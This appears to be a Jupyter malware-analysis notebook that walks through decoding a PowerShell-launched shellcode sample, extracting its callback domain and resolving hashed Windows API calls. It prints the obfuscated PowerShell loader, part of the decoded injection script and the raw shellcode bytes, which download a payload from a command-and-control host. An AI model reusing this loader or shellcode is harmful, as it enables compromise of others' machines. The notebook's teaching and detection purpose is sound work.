# Malware analysis notebook for shellcode payload by @JohnLaTwC

This notebook shows some examples of how to analyze shellcode.

The sample we will study has sha256 hash 0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f

You can find it on VirusTotal here:
https://www.virustotal.com/#/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/detection

Also uploaded here (MALWARE!):
https://gist.github.com/JohnLaTwC/2d2ac2a649deec5ac9d833285130cd21#file-0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f

Thanks to David Ledbetter (@ledtech3) for pointing it out to me!

To get started, run the cell below, then run each of the following cells in order.

In [1]:
## let's fetch the malware
def fetch_payload(url):
    import requests

    # fail loudly on HTTP errors instead of decoding an error page
    r = requests.get(url, timeout=30)
    r.raise_for_status()
    return r.content.decode()

url = 'https://gist.githubusercontent.com/JohnLaTwC/2d2ac2a649deec5ac9d833285130cd21/raw/2e961db21a845c1fb108e29eea3ce484cea1faa8/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f'
malware_str = fetch_payload(url)
print (f"Fetched {len(malware_str)} bytes")

Fetched 8199 bytes


In [2]:
len_snippet = 150
print(f'printing the first {len_snippet} bytes of the PowerShell command:\n{malware_str[0:len_snippet]}...' )

printing the first 150 bytes of the PowerShell command:
powershell -w 1 -C "sv BY -;sv bK ec;sv Kq ((gv BY).value.toString()+(gv bK).value.toString());powershell (gv Kq).value.toString() 'JABkAEcASwAgAD0AIA...


In [3]:
# Example: extract the Base64 literal with a regex, decode it, then extract just the shellcode bytes

import re
import base64

def search_for_b64_string(malware_str):
    ## the Base64 alphabet also includes '+' and '/', so allow them in the match
    match_obj = re.search(r"([A-Za-z0-9+/=]{40,})", malware_str)

    b64blob = ''
    if match_obj is not None:
        b64blob = match_obj.group(1)
    return b64blob

def search_for_hex_shellcode(str_text):
    ## get the shellcode bytes. e.g. 0xfc,0xe8,0x82,0x00,0x00,....
    ## match hex digits only (0-9, a-f), in either case
    match_obj = re.search(r"(?:0x[0-9a-fA-F]{2}[,;]){2,}", str_text)
    shellcode_hexstr = ''
    if match_obj is not None:
        shellcode_hexstr = match_obj.group(0)
        shellcode_hexstr = shellcode_hexstr.replace(';','') # remove any final semicolon

    return shellcode_hexstr
        
b64blob = search_for_b64_string(malware_str)
print(f"Length of Base64 string is {len(b64blob)} bytes")

ps_script = base64.b64decode(b64blob).decode("utf-16", "strict")
len_snippet = 700
print(f'\nPrinting the first {len_snippet} bytes of the decoded payload:\n{ps_script[0:len_snippet]}...' )

shellcode_hexstr = search_for_hex_shellcode(ps_script)
print(f"\nShellcode bytes:")
shellcode_hexstr

Length of Base64 string is 8064 bytes

Printing the first 700 bytes of the decoded payload:
$dGK = '$Zm = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$kr = Add-Type -memberDefinition $Zm -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$krB = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,...

Shellcode bytes:


'0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x7e,0xf9,0x00,0x00,0xe8,0xb0,0x00,0x00,0x00,0x2f,0x67,0x53,0x4d,0x37,0x34,0x54,0x51,0x53,0x41,0x30,0x75,0x51,0x7a,0x70

## Analyzing shellcode
We now have some x86 shellcode. The only reason this malware uses shellcode is to obfuscate what it is doing. I will show some techniques to demystify what is going on.

### Technique #1: dump strings from it
Shellcode often connects back to a domain or URL and downloads a payload. Extracting these command-and-control
network indicators can sometimes be as simple as viewing the shellcode as ASCII. If something simple works, use it.

In [4]:
## dump all strings from a buffer

def extract_strings(hex_str, min_length = 5):
    import string

    # '0xfc,0xe8,...' -> raw bytes
    shellcode_bytes = bytes.fromhex(hex_str.replace('0x', '').replace(',', ''))

    # map non-printable bytes to a tab so they act as separators between strings
    shellcode_str = ''.join(chr(c) if chr(c) in string.printable else '\t' for c in shellcode_bytes)

    # print every run of word, '.', '-' or '/' characters that is at least min_length long
    for match in re.findall(r"[\w.\-/]{%d,}" % min_length, shellcode_str):
        print(match)
    
extract_strings(shellcode_hexstr)

hwiniThLw
SSSSSh
/gSM74TQSA0uQzpHPyzb8pA3p-2Ym3
SSSWSVh
SSSSVh-
epelix-63870.portmap.io


Right away we see the string `epelix-63870.portmap.io`. This is the callback domain. We also see the string `/gSM74TQSA0uQzpHPyzb8pA3p-2Ym3`. This is part of the URL it uses. With no knowledge of assembly, we
already have a network indicator to go hunt down!
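
One way to turn the string dump into a short list of hunting leads is to filter it for domain-shaped strings. The sketch below is an illustration only: `find_domain_candidates` and its regex are assumptions, not part of the original analysis, and the pattern is deliberately loose, so treat its output as candidates to verify rather than confirmed indicators.

```python
import re

# Hypothetical helper: keep only strings that look like a dotted hostname.
# The pattern is a loose heuristic (labels of letters, digits, or hyphens
# followed by an alphabetic TLD), not a full hostname validator.
DOMAIN_RE = re.compile(r"^(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")

def find_domain_candidates(strings):
    return [s for s in strings if DOMAIN_RE.match(s)]

# the strings printed by extract_strings above
dumped = [
    "hwiniThLw",
    "SSSSSh",
    "/gSM74TQSA0uQzpHPyzb8pA3p-2Ym3",
    "SSSWSVh",
    "SSSSVh-",
    "epelix-63870.portmap.io",
]
print(find_domain_candidates(dumped))
```

Of the six dumped strings, only the `portmap.io` hostname survives the filter; the URL path is dropped because it contains no dot-separated labels.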

### Technique #2: disassemble the shellcode
You can run the payload in a sandbox and get network behavior out of it. In this notebook we are going to focus on what 
can be learned by analyzing the assembly.

I used the (great) tool CyberChef (https://gchq.github.io/CyberChef/) to disassemble the shellcode.

In [5]:
url = 'https://raw.githubusercontent.com/JohnLaTwC/Shared/master/notebooks/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f.CyberChefOutput.txt'
shellcode_str = fetch_payload(url)
print(shellcode_str)

00000000 FC                              CLD
00000001 E882000000                      CALL -FFFFFF78
00000006 60                              PUSHA
00000007 89E5                            MOV EBP,ESP
00000009 31C0                            XOR EAX,EAX
0000000B 648B5030                        MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C                          MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214                          MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228                          MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26                        MOVZX ECX,WORD PTR [EDX+26]
0000001C 31FF                            XOR EDI,EDI
0000001E AC                              LODS AL,BYTE PTR [ESI]
0000001F 3C61                            CMP AL,61
00000021 7C02                            JL 00000025
00000023 2C20                            SUB AL,20
00000025 C1CF0D                          ROR EDI,0D
00000028 01C7                            ADD EDI,EAX
0000002A

This shellcode calls various Windows APIs. To understand what it does, we need to find out which ones.

Let's look at the shellcode at offset 0x89. We see a series of `PUSH` instructions. What do they mean?

```
00000089 686E657400                      PUSH 0074656E
0000008E 6877696E69                      PUSH 696E6977
00000093 54                              PUSH ESP
00000094 684C772607                      PUSH 0726774C
```

In [6]:
# First let's  resolve the APIs in the shellcode

import re
import os
import tempfile
import sqlite3

APIDict = {}
fDbLoaded = False

def prepareAPIs():
    """Load the hash -> 'module!api' lookup table from a SQLite DB, downloading it on first use."""
    global APIDict
    global fDbLoaded

    ## cache the hash database in the temp directory so it is only downloaded once
    szDbPath = os.path.join(tempfile.gettempdir(),'apihashes.db')
    if not os.path.isfile(szDbPath):
        url = 'https://github.com/JohnLaTwC/PyPowerShellXray/blob/master/apihashes.db?raw=true'
        import urllib.request
        urllib.request.urlretrieve(url, szDbPath)

    ## load the APIs from the DB (only once per session)
    if not fDbLoaded:
        db = sqlite3.connect(szDbPath)
        cursor = db.cursor()
        cursor.execute('''SELECT module, api, hashvalue FROM APIs''')
        for szDll, szAPI, szHash in cursor.fetchall():
            APIDict[szHash] = szDll + "!" + szAPI
        db.close()
        fDbLoaded = True

def resolve_block_hashes(str_shellcode):
    if not fDbLoaded:
        prepareAPIs()
    modsz = str_shellcode
    for dw in re.findall('PUSH ([A-Fa-f0-9]{8})', str_shellcode):
        try:
            modsz = re.sub('PUSH '+ dw, APIDict['0x' + dw.lower()], modsz)
        except KeyError:
            pass
    return modsz

updated_shellcode = resolve_block_hashes(shellcode_str)
print(updated_shellcode)

00000000 FC                              CLD
00000001 E882000000                      CALL -FFFFFF78
00000006 60                              PUSHA
00000007 89E5                            MOV EBP,ESP
00000009 31C0                            XOR EAX,EAX
0000000B 648B5030                        MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C                          MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214                          MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228                          MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26                        MOVZX ECX,WORD PTR [EDX+26]
0000001C 31FF                            XOR EDI,EDI
0000001E AC                              LODS AL,BYTE PTR [ESI]
0000001F 3C61                            CMP AL,61
00000021 7C02                            JL 00000025
00000023 2C20                            SUB AL,20
00000025 C1CF0D                          ROR EDI,0D
00000028 01C7                            ADD EDI,EAX
0000002A

Now, if we look at that offset again, we see which API it is calling:
    
```
00000089 686E657400                      PUSH 0074656E
0000008E 6877696E69                      PUSH 696E6977
00000093 54                              PUSH ESP
00000094 684C772607                      kernel32.dll!LoadLibraryA
```
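
Where does a value like `0726774C` come from? The `ROR EDI,0D` / `ADD EDI,EAX` loop in the disassembly above is characteristic of a rotate-right-by-13 additive hash over the module and function names. The sketch below assumes this shellcode uses the same scheme as Metasploit's `block_api` stub (the UTF-16 module name folded to upper case plus the ASCII function name, both including the NULL terminator). The names `ror32` and `api_hash` are mine, not from the original notebook.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right by `bits`."""
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF

def api_hash(module, function, bits=13):
    # Module name: hashed byte by byte over its UTF-16LE form, terminator included.
    # Bytes 0x61..0x7F are lowered by 0x20, mirroring CMP AL,61 / JL / SUB AL,20
    # (JL is a signed compare, so bytes >= 0x80 are left alone).
    module_hash = 0
    for b in (module + "\x00").encode("utf-16-le"):
        if 0x61 <= b < 0x80:
            b -= 0x20
        module_hash = (ror32(module_hash, bits) + b) & 0xFFFFFFFF

    # Function name: hashed over its ASCII bytes, terminator included.
    function_hash = 0
    for b in (function + "\x00").encode("ascii"):
        function_hash = (ror32(function_hash, bits) + b) & 0xFFFFFFFF

    # The value pushed by the shellcode is the sum of both hashes, modulo 2**32.
    return (module_hash + function_hash) & 0xFFFFFFFF

print(f"0x{api_hash('kernel32.dll', 'LoadLibraryA'):08X}")
```

If the assumption holds, this prints `0x0726774C`, the value pushed at offset 0x94. A lookup table such as the one loaded by `prepareAPIs` can be built by running a function like this over the export names of common DLLs.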

#### Creating strings in memory by `PUSH` instructions

The shellcode below is going to call the `LoadLibraryA` API (https://docs.microsoft.com/en-us/windows/desktop/api/libloaderapi/nf-libloaderapi-loadlibrarya). If you look at the API documentation, you
see that it takes a single string parameter (`lpLibFileName`):
```
HMODULE LoadLibraryA(
  LPCSTR lpLibFileName
);

```

The sequence below passes `wininet` as `lpLibFileName`; `LoadLibraryA` appends the default `.dll` extension when the
name has none. The NULL-terminated string conveniently fits into 8 bytes ('wininet\0'), so the shellcode splits it
into two DWORDs and pushes each one onto the stack. The stack grows toward lower addresses, so the second half
('net\0') is pushed first, and because x86 is little-endian the immediate values read backwards in the disassembly.
After the second `PUSH`, the `ESP` (stack pointer) register points at the start of the string. The `PUSH ESP` then
puts that address on the stack so it can be passed as the `lpLibFileName` parameter to `LoadLibraryA`:

```
00000089 686e657400       PUSH 0074656E --> '\0ten' (bytes in memory: 'net\0')
0000008e 6877696e69       PUSH 696E6977 --> 'iniw'  (bytes in memory: 'wini')
00000093 54               PUSH ESP
```
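
To check the byte-order reasoning, the two immediates can be laid out in Python the way they end up on the stack. This is a small sketch; `decode_push_string` is a hypothetical helper name, and it assumes each `PUSH` carries a 32-bit little-endian immediate.

```python
import struct

def decode_push_string(immediates):
    """Rebuild a stack string from PUSH immediates given in execution order."""
    # The last value pushed sits at the lowest address, so it comes first in memory.
    data = b"".join(struct.pack("<I", value) for value in reversed(immediates))
    # Keep everything up to the first NULL terminator.
    return data.split(b"\x00", 1)[0].decode("ascii")

print(decode_push_string([0x0074656E, 0x696E6977]))
```

This prints `wininet`, the library name that `PUSH ESP` hands to `LoadLibraryA`.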

Now we can see that it calls `LoadLibraryA` on `wininet.dll` so that it can call additional functions from that library.

Let's see the whole list of APIs we resolved:

In [7]:
def extract_annotations_from_output(output):
    # resolved lines are the only ones containing 'module!api'
    return [line for line in output if '!' in line]

extract_annotations_from_output(updated_shellcode.split('\r\n'))

['00000094 684C772607                      kernel32.dll!LoadLibraryA',
 '000000A2 683A5679A7                      wininet.dll!InternetOpenA',
 '000000D9 6857899FC6                      wininet.dll!InternetConnectA',
 '000000EE 68EB552E3B                      wininet.dll!HttpOpenRequestA',
 '00000106 6875469E86                      wininet.dll!InternetSetOptionA',
 '00000112 682D06187B                      wininet.dll!HttpSendRequestA',
 '00000122 6844F035E0                      kernel32.dll!Sleep',
 '0000012C 68F0B5A256                      kernel32.dll!ExitProcess',
 '00000140 6858A453E5                      kernel32.dll!VirtualAlloc',
 '00000154 68129689E2                      wininet.dll!InternetReadFile']
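
Each annotated line still carries the raw instruction bytes, so the hash can be recovered from it: `68` is the `PUSH imm32` opcode and the next four bytes are the little-endian immediate. A minimal sketch, assuming the three-column layout shown above; `parse_annotation` is a hypothetical helper, not part of the original notebook.

```python
import struct

def parse_annotation(line):
    """Split 'OFFSET RAWBYTES module!api' into (offset, hash, module, api)."""
    offset, raw, label = line.split(None, 2)
    module, api = label.strip().split("!", 1)
    # raw[0:2] is the opcode (68); the remaining 8 hex digits are the imm32
    (hash_value,) = struct.unpack("<I", bytes.fromhex(raw[2:10]))
    return int(offset, 16), hash_value, module, api

line = "00000094 684C772607                      kernel32.dll!LoadLibraryA"
offset, hash_value, module, api = parse_annotation(line)
print(f"{offset:#x} {hash_value:#010x} {module} {api}")
```

Parsing the lines this way makes it easy to group the calls by module or to sort them by offset and read off the order in which the shellcode uses them.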